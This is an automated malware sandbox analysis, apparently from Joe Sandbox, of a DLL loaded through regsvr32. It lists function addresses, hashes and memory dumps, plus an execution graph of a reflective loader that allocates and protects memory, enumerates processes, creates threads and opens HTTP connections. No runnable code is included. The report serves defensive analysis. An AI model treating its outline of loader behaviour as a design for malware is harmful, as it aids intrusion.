                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ParentWindow$Long
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 941798831-0
                                                                                                                                                                                    • Opcode ID: 6687eb83d4da57f798624ce84f753de6a77b6675b2a4a1b1c1581479d854f9bd
                                                                                                                                                                                    • Instruction ID: 08190af709a1f558c6563a9d75fd1bc1c5c636d72ae4dbb024ef45fd01c7b658
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6687eb83d4da57f798624ce84f753de6a77b6675b2a4a1b1c1581479d854f9bd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BF0493560494886EBD2AB57E4543E923A1FB8DFD5F29CD30FA5607796CE78C6484304
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180024848 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                    • API String ID: 3186804695-3733052814
                                                                                                                                                                                    • Opcode ID: 50c5e3198e7e907a5bad70b967f02ee750eb4e0ae4698bd86b66af7069547fbb
                                                                                                                                                                                    • Instruction ID: 5e4e7da6e2b5d6411aaaa4b54eba88457d7b1240e4d28edd770d73096ae9a95e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 50c5e3198e7e907a5bad70b967f02ee750eb4e0ae4698bd86b66af7069547fbb
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF51AF336042888AEBB39F2591403EE7790F749BC4F44C115FA595BB85CF38CA98CB06
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002AB60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno
                                                                                                                                                                                    • String ID: 1
                                                                                                                                                                                    • API String ID: 2918714741-2212294583
                                                                                                                                                                                    • Opcode ID: 95df07a8a6796a354bf165917a577bf94fa76e3b602788e1f1d752386ea3758c
                                                                                                                                                                                    • Instruction ID: 5420f3c3310fc9e21b811881aa5383aac546be88c9790c7369b15ce80ff05f35
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95df07a8a6796a354bf165917a577bf94fa76e3b602788e1f1d752386ea3758c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E21B63221D6C88BF7E78B3884143ED6B91974E7C4FA8C411BB4A466C3DF6D8A49C711
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000CD54 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CtrlRect$ClientLongMessageScreenSend
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 1956310361-2766056989
                                                                                                                                                                                    • Opcode ID: b1914e996d04f23435664ca273098c49df46592cfdfad7ccb9c09403c7f699b2
                                                                                                                                                                                    • Instruction ID: 79cd3dbe5692b909c157d9db1704a0801bf918491cd19f34586874804a5f6e6e
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1914e996d04f23435664ca273098c49df46592cfdfad7ccb9c09403c7f699b2
                                                                                                                                                                                    • Instruction Fuzzy Hash: B6016132614B8582EB55CF25E4857597A60F748BF4F188325FEBA07BD8CF38C5558700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180030153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                    • API String ID: 3186804695-1018135373
                                                                                                                                                                                    • Opcode ID: bf9ab7e349eea3d33eec0258e5e4178034c863033116fc655711d284816704fa
                                                                                                                                                                                    • Instruction ID: 961ad291d77580d6b7f4699af0e9b54f24cfd1812cb26fc8286fb2cc02644495
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf9ab7e349eea3d33eec0258e5e4178034c863033116fc655711d284816704fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0801403254168889DBB7DF61C8513EE3364E76CB89F558125EA090A685DF24C788C741
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180017DF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32 ref: 0000000180017E1F
                                                                                                                                                                                    • PathFindExtensionA.SHLWAPI ref: 0000000180017E35
                                                                                                                                                                                      • Part of subcall function 0000000180017974: GetModuleHandleA.KERNEL32 ref: 00000001800179C5
                                                                                                                                                                                      • Part of subcall function 0000000180017974: GetProcAddress.KERNEL32 ref: 00000001800179D8
                                                                                                                                                                                      • Part of subcall function 0000000180017974: ConvertDefaultLocale.KERNEL32 ref: 0000000180017A07
                                                                                                                                                                                      • Part of subcall function 0000000180017974: ConvertDefaultLocale.KERNEL32 ref: 0000000180017A13
                                                                                                                                                                                      • Part of subcall function 0000000180017974: GetProcAddress.KERNEL32 ref: 0000000180017A2B
                                                                                                                                                                                      • Part of subcall function 0000000180017974: ConvertDefaultLocale.KERNEL32 ref: 0000000180017A55
                                                                                                                                                                                      • Part of subcall function 0000000180017974: ConvertDefaultLocale.KERNEL32 ref: 0000000180017A61
                                                                                                                                                                                      • Part of subcall function 0000000180017974: GetModuleFileNameA.KERNEL32 ref: 0000000180017B22
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindHandlePath
                                                                                                                                                                                    • String ID: %s%s.dll
                                                                                                                                                                                    • API String ID: 288242826-1649984862
                                                                                                                                                                                    • Opcode ID: 224d040147359b70b3aaf82dcb824328f28c0b07b9284d7ade4124a585a109b0
                                                                                                                                                                                    • Instruction ID: 68476159a46b848b6511f3017caa613d0ba04a07d827ccd93729d57f6697ebf0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 224d040147359b70b3aaf82dcb824328f28c0b07b9284d7ade4124a585a109b0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91012131318A8985EBA29B15E8513DA23A0F39CBC5F808151F68D47766DE2DC60DC700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001CE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreate$Open
                                                                                                                                                                                    • String ID: Settings
                                                                                                                                                                                    • API String ID: 1740278721-473154195
                                                                                                                                                                                    • Opcode ID: 86b8f25331f3e0e0b2f4df3264e5005ca27c3d1a475327831ded131a50054760
                                                                                                                                                                                    • Instruction ID: 78740abde83cd2bc7836165233464118928347f306f647dc62b8ea32dc52b10a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 86b8f25331f3e0e0b2f4df3264e5005ca27c3d1a475327831ded131a50054760
                                                                                                                                                                                    • Instruction Fuzzy Hash: 40F04932618B8487EB518B25F0847AAB7A0F78CBD5F544225FB8D06B69DF3CC1888F00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001B0C4 Relevance: 5.0, APIs: 4, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3969253408-0
                                                                                                                                                                                    • Opcode ID: ae274e6c84a70c9e0738021e81f9a9f4afc20c491fdc5af10655d7bbd26850bb
                                                                                                                                                                                    • Instruction ID: 28652449caf400a93a67b6eb8d62305aa1df4026e5183692b07ceb4d29ee1308
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae274e6c84a70c9e0738021e81f9a9f4afc20c491fdc5af10655d7bbd26850bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: FD01FB31200A4896EBA68F16E4D17EA6364F74CBC1F4A8465E75A43764CF28D6898700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:17.9%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:99%
                                                                                                                                                                                    Signature Coverage:4%
                                                                                                                                                                                    Total number of Nodes:101
                                                                                                                                                                                    Total number of Limit Nodes:11
                                                                                                                                                                                    execution_graph 3697 2c80000 3698 2c80185 3697->3698 3699 2c803f2 VirtualAlloc 3698->3699 3702 2c80418 3699->3702 3700 2c804dc GetNativeSystemInfo 3701 2c80518 VirtualAlloc 3700->3701 3704 2c80a09 3700->3704 3703 2c80536 VirtualAlloc 3701->3703 3708 2c8054b 3701->3708 3702->3700 3702->3704 3703->3708 3705 2c80998 3705->3704 3706 2c809e4 RtlAvlRemoveNode 3705->3706 3706->3704 3707 2c80971 VirtualProtect 3707->3708 3708->3705 3708->3707 3709 2cdd864 3710 2cdd8cc 3709->3710 3711 2cdd97b CreateThread 3710->3711 3712 2cde650 3711->3712 3714 2cde6a9 3712->3714 3713 2cdf05e 3714->3713 3716 2ced79c 3714->3716 3717 2ced822 3716->3717 3718 2ced8ac CreateFileW 3717->3718 3718->3714 3719 2cd1fe0 3722 2ce0de8 3719->3722 3721 2cd204f 3731 2ce0e26 3722->3731 3724 2ce2768 3724->3721 3731->3724 3732 2ce8660 3731->3732 3736 2cf4f04 3731->3736 3740 2cd3a18 3731->3740 3745 2cd4f4c 3731->3745 3749 2cd59b0 3731->3749 3757 2cdd9a8 3731->3757 3761 2ce2c78 3731->3761 3735 2ce869d 3732->3735 3733 2ce89e5 3733->3731 3735->3733 3765 2cd1f18 3735->3765 3737 2cf4f1f 3736->3737 3738 2cf4f91 3737->3738 3772 2cd6d50 3737->3772 3738->3731 3743 2cd3a4d 3740->3743 3741 2cd3faf 3741->3731 3742 2ced79c CreateFileW 3742->3743 3743->3741 3743->3742 3744 2cd3e08 FindCloseChangeNotification 3743->3744 3744->3743 3748 2cd4f9f 3745->3748 3747 2cd5987 3747->3731 3748->3747 3783 2cf038c 3748->3783 3754 2cd59dd 3749->3754 3751 2cd5d84 3751->3731 3754->3751 3794 2ce8258 3754->3794 3798 2cedb5c 3754->3798 3802 2cd28f8 3754->3802 3806 2cd8db4 3754->3806 3810 2ce7a70 3754->3810 3759 2cdd9e1 3757->3759 3758 2cdd864 2 API calls 3758->3759 3759->3758 3760 2cddc79 3759->3760 3760->3731 3764 2ce2cab 3761->3764 3762 2ced79c CreateFileW 3762->3764 3763 2ce2cf8 3763->3731 3764->3762 3764->3763 3768 2cec860 3765->3768 3767 2cd1fd7 3767->3735 3769 2cec89b 3768->3769 3770 2cecba7 3769->3770 3771 2ceca5f Process32FirstW 3769->3771 3770->3767 3771->3769 3773 2cd6d6f 3772->3773 3775 2cd70c0 3773->3775 3776 2cdb1e0 3773->3776 3775->3738 3777 2cdb302 3776->3777 3778 2cdb4f6 3777->3778 3780 2cdf994 3777->3780 3778->3773 3781 2cdfa19 3780->3781 3782 2cdfac3 GetVolumeInformationW 3781->3782 3782->3778 3787 2cf040d 3783->3787 3784 2cf127e 3784->3748 3787->3784 3788 2cde0d4 3787->3788 3791 2cd91ec 3787->3791 3789 2cde16b 3788->3789 3790 2cde202 InternetConnectW 3789->3790 3790->3787 3792 2cd926e 3791->3792 3793 2cd930d HttpOpenRequestW 3792->3793 3793->3787 3797 2ce8284 3794->3797 3796 2ce8649 3796->3754 3797->3796 3814 2cdd864 3797->3814 3800 2cedc18 3798->3800 3799 2ceecdb 3799->3754 3800->3799 3818 2ce00f0 3800->3818 3804 2cd293e 3802->3804 3803 2cd298d 3803->3754 3804->3803 3805 2ce00f0 CreateFileW 3804->3805 3805->3804 3809 2cd8df0 3806->3809 3807 2cdd864 2 API calls 3807->3809 3808 2cd91d5 3808->3754 3809->3807 3809->3808 3812 2ce7aa9 3810->3812 3811 2ce7ff1 3811->3754 3812->3811 3813 2ce00f0 CreateFileW 3812->3813 3813->3812 3815 2cdd8cc 3814->3815 3816 2cdd97b CreateThread 3815->3816 3816->3797 3817 2cde650 CreateFileW 3816->3817 3819 2ce011a 3818->3819 3820 2ced79c CreateFileW 3819->3820 3821 2ce03ad 3819->3821 3820->3819 3821->3800

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 02C80000 Relevance: 74.6, APIs: 6, Strings: 36, Instructions: 1066memoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 2c80000-2c80416 call 2c80a40 * 2 VirtualAlloc 21 2c80418-2c8041c 0->21 22 2c8043a-2c80441 0->22 23 2c8041e-2c80438 21->23 24 2c80a23 22->24 25 2c80447-2c8044b 22->25 23->22 23->23 26 2c80a25-2c80a3f 24->26 25->24 27 2c80451-2c80455 25->27 27->24 28 2c8045b-2c8045f 27->28 28->24 29 2c80465-2c8046c 28->29 29->24 30 2c80472-2c8047f 29->30 30->24 31 2c80485-2c8048e 30->31 31->24 32 2c80494-2c8049f 31->32 32->24 33 2c804a5-2c804b2 32->33 34 2c804dc-2c80512 GetNativeSystemInfo 33->34 35 2c804b4-2c804bc 33->35 34->24 37 2c80518-2c80534 VirtualAlloc 34->37 36 2c804be-2c804c3 35->36 38 2c804cc 36->38 39 2c804c5-2c804ca 36->39 40 2c8054b-2c80554 37->40 41 2c80536-2c80549 VirtualAlloc 37->41 42 2c804ce-2c804da 38->42 39->42 43 2c80561-2c80564 40->43 41->40 42->34 42->36 44 2c80556-2c8055e 43->44 45 2c80566-2c80580 43->45 44->43 46 2c805c0-2c805cd 45->46 47 2c80582-2c80587 45->47 49 2c80690-2c80697 46->49 50 2c805d3-2c805da 46->50 48 2c80589-2c8058f 47->48 51 2c805b0-2c805be 48->51 52 2c80591-2c805ae 48->52 53 2c80809-2c80810 49->53 54 2c8069d-2c806ae 49->54 50->49 55 2c805e0-2c805ed 50->55 51->46 51->48 52->51 52->52 56 2c808b3-2c808c5 53->56 57 2c80816-2c80824 53->57 58 2c806b7-2c806ba 54->58 55->49 59 2c805f3-2c805f4 55->59 60 2c80998-2c809ab 56->60 61 2c808cb-2c808d3 56->61 62 2c808aa-2c808ad 57->62 64 2c806bc-2c806bf 58->64 65 2c806b0-2c806b4 58->65 63 2c805f9-2c80607 59->63 85 2c809ad-2c809b8 60->85 86 2c809d1-2c809d8 60->86 67 2c808d6-2c808da 61->67 62->56 66 2c80829-2c8084b 62->66 68 2c80609 63->68 69 2c80684-2c8068a 63->69 70 2c8073a-2c80740 64->70 71 2c806c1-2c806cf 64->71 65->58 91 2c8084d-2c80853 66->91 92 2c808a6-2c808a7 66->92 72 2c808e0-2c808f5 67->72 73 2c80984-2c80992 67->73 74 2c8060e-2c8061c 68->74 69->49 69->63 77 2c80743-2c80751 70->77 76 2c806d1-2c806d2 71->76 71->77 81 2c80918-2c8091a 72->81 82 2c808f7-2c808f9 72->82 73->60 73->67 83 2c8062d-2c80631 74->83 84 2c8061e-2c8062b 74->84 87 2c806d4-2c80736 76->87 78 2c80806-2c80807 77->78 79 2c80757 77->79 78->53 88 2c8075a-2c80780 79->88 95 2c8091c-2c8091e 81->95 96 2c8093f-2c80941 81->96 93 2c80909-2c80916 82->93 94 2c808fb-2c80907 82->94 98 2c8063f-2c80643 83->98 99 2c80633-2c8063d 83->99 97 2c80675-2c80682 84->97 100 2c809c9-2c809cf 85->100 89 2c80a09-2c80a21 86->89 90 2c809da-2c809e2 86->90 87->87 101 2c80738 87->101 122 2c807e1-2c807e5 88->122 123 2c80782-2c80785 88->123 89->26 90->89 103 2c809e4-2c80a07 RtlAvlRemoveNode 90->103 112 2c8085d-2c8086a 91->112 113 2c80855-2c8085b 91->113 92->62 104 2c80956-2c80957 93->104 94->104 105 2c80920-2c80924 95->105 106 2c80926-2c80928 95->106 110 2c80949-2c80953 96->110 111 2c80943-2c80947 96->111 97->69 97->74 108 2c80658-2c8065c 98->108 109 2c80645-2c80656 98->109 107 2c80669-2c80670 99->107 100->86 102 2c809ba-2c809c6 100->102 101->77 102->100 103->89 118 2c8095d-2c80963 104->118 105->104 106->96 116 2c8092a-2c8092c 106->116 107->97 108->97 117 2c8065e-2c80666 108->117 109->107 110->104 111->104 120 2c8086c-2c80873 112->120 121 2c80875-2c80887 112->121 119 2c8088c-2c8089d 113->119 124 2c8092e-2c80934 116->124 125 2c80936-2c8093d 116->125 117->107 126 2c80971-2c80981 VirtualProtect 118->126 127 2c80965-2c8096b 118->127 119->92 134 2c8089f-2c808a4 119->134 120->120 120->121 121->119 131 2c807f0-2c807f9 122->131 132 2c807e7 122->132 129 2c8078f-2c8079c 123->129 130 2c80787-2c8078d 123->130 124->104 125->118 126->73 127->126 136 2c8079e-2c807a5 129->136 137 2c807a7-2c807b9 129->137 135 2c807be-2c807d8 130->135 131->88 138 2c807ff-2c80800 131->138 132->131 134->91 135->122 140 2c807da-2c807df 135->140 136->136 136->137 137->135 138->78 140->123
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518659425.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2c80000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Virtual$Alloc$InfoNativeNodeProtectRemoveSystem
                                                                                                                                                                                    • String ID: Cach$Find$Flus$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$p$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce
                                                                                                                                                                                    • API String ID: 808794760-1106743406
                                                                                                                                                                                    • Opcode ID: 96fce6a7bff5e5b76bf571e1cae8f3a184cbff359d7bfa11d59d9d5912008097
                                                                                                                                                                                    • Instruction ID: 26daa3500a64457429d98f0f14a8bb8ccf83af7103e22a9fa0b5e9a670f0721c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96fce6a7bff5e5b76bf571e1cae8f3a184cbff359d7bfa11d59d9d5912008097
                                                                                                                                                                                    • Instruction Fuzzy Hash: E372F631618B488FDB18EF18C8857BAB7E1FF94309F14862DE88AD7211DB34D546CB85
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 02CE8CAC Relevance: 5.4, Strings: 4, Instructions: 426COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 434 2ce8cac-2ce8d0d call 2cf144c 437 2ce8d15-2ce8d1a 434->437 438 2ce93b6-2ce93ba 437->438 439 2ce8d20-2ce8d25 437->439 440 2ce93bf-2ce93c4 438->440 441 2ce8d2b-2ce8d30 439->441 442 2ce9214-2ce93ac call 2cecc48 call 2cd39a8 call 2cef3f0 439->442 446 2ce946d-2ce947f 440->446 447 2ce93ca 440->447 443 2ce8d36-2ce8d3b 441->443 444 2ce9175-2ce9201 call 2cde020 441->444 442->438 448 2ce90d0-2ce9159 call 2cf182c 443->448 449 2ce8d41-2ce8d46 443->449 456 2ce9206-2ce920a 444->456 447->437 459 2ce915e-2ce9165 448->459 452 2ce93cf-2ce9468 call 2cdc77c 449->452 453 2ce8d4c-2ce8d51 449->453 452->446 453->440 457 2ce8d57-2ce8d85 453->457 456->442 461 2ce8d8b-2ce8d90 457->461 462 2ce90a3-2ce90b7 457->462 459->446 464 2ce916b-2ce9170 459->464 465 2ce8d92-2ce8d99 461->465 466 2ce8db1-2ce8db3 461->466 468 2ce90bc-2ce90cb 462->468 464->468 470 2ce8d9b-2ce8d9f 465->470 471 2ce8da7-2ce8dac 465->471 466->471 472 2ce8db5-2ce9005 call 2cecc48 call 2ce5dac call 2ce8cac 466->472 468->437 470->466 473 2ce8da1-2ce8da5 470->473 471->437 479 2ce900a-2ce909e call 2cef3f0 472->479 473->466 473->471 479->471
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_2cd1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 8I`%$;_|$V`p$s+C
                                                                                                                                                                                    • API String ID: 0-3694424346
                                                                                                                                                                                    • Opcode ID: 3c8b60d5bf308e10872c21dfdcba23dd6ebcd82dadb27c9a7f4eb8d53d6be293
                                                                                                                                                                                    • Instruction ID: 427c31c495477dffa7647cd344da9e379b7a74ab1a67f7b8a1dd0687edf8f9b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c8b60d5bf308e10872c21dfdcba23dd6ebcd82dadb27c9a7f4eb8d53d6be293
                                                                                                                                                                                    • Instruction Fuzzy Hash: E322DC705087C88BC758DFA9C58A55FFBE2FBC4748F508A1DE4868B260D7B8D949CB42
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 02CE3438 Relevance: 4.0, Strings: 3, Instructions: 298COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
